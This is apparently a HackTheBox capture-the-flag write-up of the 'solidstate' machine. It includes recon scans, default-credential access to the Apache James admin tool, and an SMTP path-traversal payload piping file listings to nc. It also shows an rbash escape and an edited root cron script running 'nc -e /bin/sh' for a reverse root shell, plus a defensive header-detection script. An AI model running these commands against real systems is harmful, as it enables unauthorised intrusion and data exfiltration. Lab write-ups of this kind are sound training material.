solidstate

Introduction:

Recon

nmap scan

```
eneloop@kinetic:…/hackthebox/solidstate/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.solidstate.txt 10.10.10.51
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 09:27 EST
Nmap scan report for 10.10.10.51
Host is up (0.015s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.38 [10.10.14.38]), 
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/23%OT=22%CT=1%CU=34458%PV=Y%DS=2%DC=I%G=Y%TM=600C327
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
OS:1NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.98 seconds
```

Additional ports discovered with a full-range scan:

```
eneloop@kinetic:…/hackthebox/solidstate/data$ nmap -p0- -v -A -T4 10.10.10.51
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-23 09:28 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:28
Completed NSE at 09:28, 0.00s elapsed
Initiating NSE at 09:28
Completed NSE at 09:28, 0.00s elapsed
Initiating NSE at 09:28
Completed NSE at 09:28, 0.00s elapsed
Initiating Ping Scan at 09:28
Scanning 10.10.10.51 [2 ports]
Completed Ping Scan at 09:28, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:28
Completed Parallel DNS resolution of 1 host. at 09:28, 0.01s elapsed
Initiating Connect Scan at 09:28
Scanning 10.10.10.51 [65536 ports]
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
Discovered open port 4555/tcp on 10.10.10.51
```

```
eneloop@kinetic:…/hackthebox/solidstate/data$ nikto -url http://10.10.10.51/
- Nikto v2.1.6
+ Target IP:          10.10.10.51
+ Target Hostname:    10.10.10.51
+ Target Port:        80
+ Start Time:         2021-01-23 09:52:40 (GMT-5)
+ Server: Apache/2.4.25 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5610a1e7a4c9b, mtime: gzip
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2021-01-23 09:55:20 (GMT-5) (160 seconds)
+ 1 host(s) tested
```

Added a host entry. The redirection has to run as root as well, so the append goes through `tee` rather than `sudo echo ... >>`, which would fail with permission denied:

```
echo "10.10.10.51 solidstate.htb" | sudo tee -a /etc/hosts
```

Enumeration


The homepage reveals the following information:

James Admin tool

```
eneloop@kinetic:.../hackthebox/solidstate/data$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
```

Search for exploits

```
eneloop@kinetic:.../hackthebox/solidstate/data$ searchsploit james
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                   | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploi | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                               | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                | windows/remote/944.c
----------------------------------------------------------------------------------- ---------------------------------
```

Exploitation strategy:

  • Exploit the remote administration tool by setting credentials for an existing user
  • Use the exploit above to send a reverse shell command into a file
  • Start a listener and log in as that user to trigger the exploit

Exploitation

```
MAIL FROM: '[email protected]
RCPT TO: ../../../../../../../../etc/bash_completion.d
DATA
From: [email protected]
'
find / -type f | nc 10.10.14.38 4444
.
QUIT
```
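Seen from the mail server's side, the indicator of this technique is a recipient whose local part is a filesystem path rather than a mailbox name; that is exactly what the `Delivered-To` and `Received: ... for <...>` headers of the delivered message contain. The detector below is an added example, not code from the writeup or from Apache James: it unfolds a constructed copy of those headers (sender address and the `SAMPLE_HEADERS`, `unfold`, `path_like` and `find_traversal_recipients` names are assumptions made here) and flags such recipients.

```python
import re

# Constructed sample, modelled on the headers that appear in the rbash error
# spew above: the recipient's local part is a filesystem path, not a mailbox.
SAMPLE_HEADERS = (
    "Message-ID: <28046011.0.1611416094084.JavaMail.root@solidstate>\n"
    "MIME-Version: 1.0\n"
    "Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost\n"
    "Received: from 10.10.14.38 ([10.10.14.38])\n"
    "          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 37\n"
    "          for <../../../../../../../../etc/bash_completion.d@localhost>;\n"
    "          Sat, 23 Jan 2021 10:34:53 -0500 (EST)\n"
    "Date: Sat, 23 Jan 2021 10:34:53 -0500 (EST)\n"
    "From: sender@example.com\n"
)

def unfold(headers):
    """Join RFC 5322 folded continuation lines (leading whitespace) onto their header."""
    out = []
    for line in headers.splitlines():
        if line[:1] in (" ", "\t") and out:
            out[-1] += " " + line.strip()
        else:
            out.append(line)
    return out

def path_like(local_part):
    """True when a mailbox name would be used as a path on disk rather than a name."""
    return "/" in local_part or "\\" in local_part or local_part.startswith(".")

def find_traversal_recipients(headers):
    """Return (header, address) pairs whose recipient local part looks like a path."""
    hits = []
    for line in unfold(headers):
        name, sep, value = line.partition(":")
        if not sep:
            continue
        if name == "Delivered-To":
            addrs = [value.strip()]
        elif name == "Received":
            addrs = re.findall(r"\bfor\s+<([^>]+)>", value)
        else:
            continue
        for addr in addrs:
            local, at, _domain = addr.rpartition("@")
            if at and path_like(local):
                hits.append((name, addr))
    return hits

if __name__ == "__main__":
    for header, addr in find_traversal_recipients(SAMPLE_HEADERS):
        print(f"{header}: suspicious recipient {addr!r}")
```

Running the same function over a mail spool or over SMTP logs that record the envelope recipient gives an after-the-fact audit of whether a James 2.3.2 instance has already been used this way.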

Reset the passwords of all mail accounts and read their mail. The chatter between john and james indicates that mindy's mailbox should contain credentials.

Let's reset mindy's password and log in with a mail client to read her mail:

```
(py2) eneloop@kinetic:…/hackthebox/solidstate/data$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
setpassword mindy mindy
Password for mindy reset

Unknown command
quit
Bye
```

SSH in with the password retrieved from the email; we end up in rbash. The file written into /etc/bash_completion.d is sourced on login, so its serialized Java object shows up as a stream of shell errors:

```
(py2) eneloop@kinetic:.../hackthebox/solidstate/data$ ssh [email protected]
[email protected]'s password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <28046011.0.1611416094084.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.38 ([10.10.14.38])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 37
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Sat, 23 Jan 2021 10:34:53 -0500 (EST)
Date: Sat, 23 Jan 2021 10:34:53 -0500 (EST)
From: [email protected]

: No such file or directory
-rbash: $'\r': command not found
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
         errorMessagetLjava/lang/String: No such file or directory
-rbash: L
         lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <5839625.1.1611416616236.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.38 ([10.10.14.38])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 918
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Sat, 23 Jan 2021 10:43:36 -0500 (EST)
Date: Sat, 23 Jan 2021 10:43:36 -0500 (EST)
From: [email protected]

: No such file or directory
-rbash: $'\r': command not found
mindy@solidstate:~$ 
```

Escape rbash

```
(py2) eneloop@kinetic:.../hackthebox/solidstate/data$ ssh [email protected] -t "bash --noprofile"
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $SHELL
/bin/rbash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james  mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ 
```

Post-exploit/PrivEsc

```
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('date >/home/mindy/date.out')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /home/mindy/date.out
-rw-r--r-- 1 root root 29 Jan 23 14:06 /home/mindy/date.out
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 
```

The root-owned date.out shows the script is run by root on a schedule, and mindy can edit it:

```
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ vi /opt/tmp.py 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('nc -e /bin/sh 10.10.14.38 4444')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ 
```

```
(py3) root@kinetic:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.10.51] 41498
ls -l
total 4
-rw------- 1 root root 33 Nov 18 09:29 root.txt
cat root.txt
4f4XXXXXXXXXXXXXXXXXX4953d
whoami
root
```

Notes: